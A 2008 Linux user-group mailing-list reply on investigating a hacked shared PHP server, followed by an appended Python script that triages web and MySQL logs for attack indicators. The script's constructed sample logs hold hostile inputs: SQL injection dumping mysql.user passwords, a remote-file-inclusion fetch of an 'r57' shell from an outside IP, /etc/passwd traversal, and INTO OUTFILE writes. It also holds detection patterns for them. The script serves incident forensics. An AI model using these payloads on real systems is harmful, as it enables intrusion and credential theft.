[sf-lug] Hacked RHEL4/PHP4 server

Kristian Erik Hermansen kristian.hermansen at gmail.com
Wed May 21 22:28:39 PDT 2008


On Wed, May 21, 2008 at 10:15 PM, Tom Haddon <tom at greenleaftech.net> wrote:
> - How did they actually modify the content? Through a PHP exploit, or
> shell access?

If your application was insecure, then sure, they could have perhaps
done this without shell access.  However, since it is a shared server,
perhaps it was compromised by another local user who then changed
every site on the server.  I would investigate the other sites being
served from your shared host, or ask the hosting company if they heard
of any other complaints about similar sites being hosted from that
server.  Also, check your logs and SQL transaction history.  Maybe you
can find some abnormal queries floating around in there and trace it
back to the vulnerable PHP code, if that was the entry point...
-- 
Kristian Erik Hermansen
--
"When you share your joys you double them; when you share your sorrows
you halve them."
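The log-triage step suggested in the message above (check the web server
and SQL logs for abnormal queries and trace them back to the PHP script),
as an added example that is not part of the original message or thread.
It parses Apache combined-format access log lines and MySQL general-log
entries, flags requests and queries that match common PHP4-era attack
patterns (SQL injection, remote file inclusion, path traversal, INTO
OUTFILE, credential dumps), and groups the hits by the script they hit so
a code review starts in the right file. The log lines, IP addresses, file
names and indicator lists are constructed for illustration; they are
assumptions, not data from the compromised host.

```python
"""Triage an Apache access log and a MySQL general query log for the kind of
requests and queries that usually precede a PHP web-app compromise, and group
the hits by the script they target. All sample log lines below are
constructed for this example, not real data."""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# MySQL general log: "YYMMDD HH:MM:SS  thread Command  Argument"; continuation
# lines for the same thread omit the timestamp.
GENERAL_RE = re.compile(
    r'^(?:\d{6}\s+\d{1,2}:\d{2}:\d{2})?\s*(?P<thread>\d+)\s+Query\s+(?P<sql>.*)$'
)

# Request-level indicators, applied to the URL-decoded request path.
REQUEST_INDICATORS = [
    ("sql-injection", re.compile(
        r"union\s+(all\s+)?select|into\s+(out|dump)file|load_file\s*\(|information_schema"
        r"|mysql\.user|['\"]\s*(or|and)\s+['\"\w]+\s*=", re.I)),
    ("remote-file-inclusion", re.compile(r"[?&]\w+=\s*(https?|ftp)://", re.I)),
    ("path-traversal", re.compile(r"(\.\./){2,}|/etc/passwd|/proc/self", re.I)),
]

# Query-level indicators: statements a small site's PHP code has no reason to
# issue, so a plain "SELECT ... FROM" is deliberately not flagged here.
QUERY_INDICATORS = [
    ("credential-dump", re.compile(r"\bfrom\s+mysql\.user\b|\binformation_schema\b", re.I)),
    ("file-io", re.compile(r"into\s+(out|dump)file|load_file\s*\(", re.I)),
    ("stacked-union", re.compile(r"union\s+(all\s+)?select", re.I)),
]

# Constructed sample input (hypothetical hosts and scripts).
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [21/May/2008:20:01:12 -0700] "GET /index.php?page=about HTTP/1.1" 200 5120 "-" "Mozilla/4.0"
203.0.113.7 - - [21/May/2008:20:01:40 -0700] "GET /index.php?page=http://198.51.100.9/r57.txt? HTTP/1.1" 200 812 "-" "Mozilla/4.0"
198.51.100.23 - - [21/May/2008:20:03:02 -0700] "GET /news.php?id=5%20UNION%20SELECT%201,user,password%20FROM%20mysql.user HTTP/1.1" 200 2210 "-" "libwww-perl/5.805"
198.51.100.23 - - [21/May/2008:20:03:09 -0700] "GET /news.php?id=5 HTTP/1.1" 200 2210 "-" "libwww-perl/5.805"
192.0.2.44 - - [21/May/2008:20:05:55 -0700] "GET /gallery.php?file=../../../../etc/passwd HTTP/1.1" 200 1034 "-" "Mozilla/5.0"
"""

SAMPLE_GENERAL_LOG = """\
080521 20:03:02      5 Query  SELECT * FROM news WHERE id=5 UNION SELECT 1,user,password FROM mysql.user
                     5 Query  SELECT * FROM news WHERE id=5
080521 20:05:10      6 Connect  webapp@localhost on sitedb
080521 20:05:11      6 Query  SELECT 'x' INTO OUTFILE '/var/www/html/x.php'
"""


def url_decode(s, rounds=2):
    """Strip up to `rounds` layers of percent-encoding; attackers double-encode
    to dodge naive greps, so one pass of unquote is not enough."""
    for _ in range(rounds):
        decoded = unquote_plus(s)
        if decoded == s:
            break
        s = decoded
    return s


def scan_access_log(text):
    """Return one finding per request that trips a request-level indicator."""
    findings = []
    for line in text.splitlines():
        m = ACCESS_RE.match(line)
        if not m:
            continue
        decoded = url_decode(m["path"])
        tags = [name for name, rx in REQUEST_INDICATORS if rx.search(decoded)]
        if tags:
            findings.append({
                "ip": m["ip"], "ts": m["ts"], "status": int(m["status"]),
                "script": m["path"].split("?", 1)[0], "tags": tags, "request": decoded,
            })
    return findings


def scan_general_log(text):
    """Return one finding per logged Query that trips a query-level indicator."""
    findings = []
    for line in text.splitlines():
        m = GENERAL_RE.match(line)
        if not m:
            continue
        tags = [name for name, rx in QUERY_INDICATORS if rx.search(m["sql"])]
        if tags:
            findings.append({"thread": int(m["thread"]), "tags": tags, "sql": m["sql"].strip()})
    return findings


def scripts_to_review(access_findings):
    """Map each flagged PHP script to the sorted indicator names seen against it."""
    out = {}
    for f in access_findings:
        out.setdefault(f["script"], set()).update(f["tags"])
    return {script: sorted(tags) for script, tags in out.items()}


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_ACCESS_LOG):
        print(f["ts"], f["ip"], f["status"], ",".join(f["tags"]), f["request"])
    for f in scan_general_log(SAMPLE_GENERAL_LOG):
        print("thread", f["thread"], ",".join(f["tags"]), f["sql"])
    print(scripts_to_review(scan_access_log(SAMPLE_ACCESS_LOG)))
```

Run it against the real logs by feeding open(...).read() to the two scan
functions. The access-log side tells you which script and which parameter
was attacked and whether the server answered 200; the general-log side
(only available if log= or general_log was on before the incident) shows
whether the injected SQL actually reached the database, which is the
strongest evidence that the PHP code, not another local user, was the
entry point.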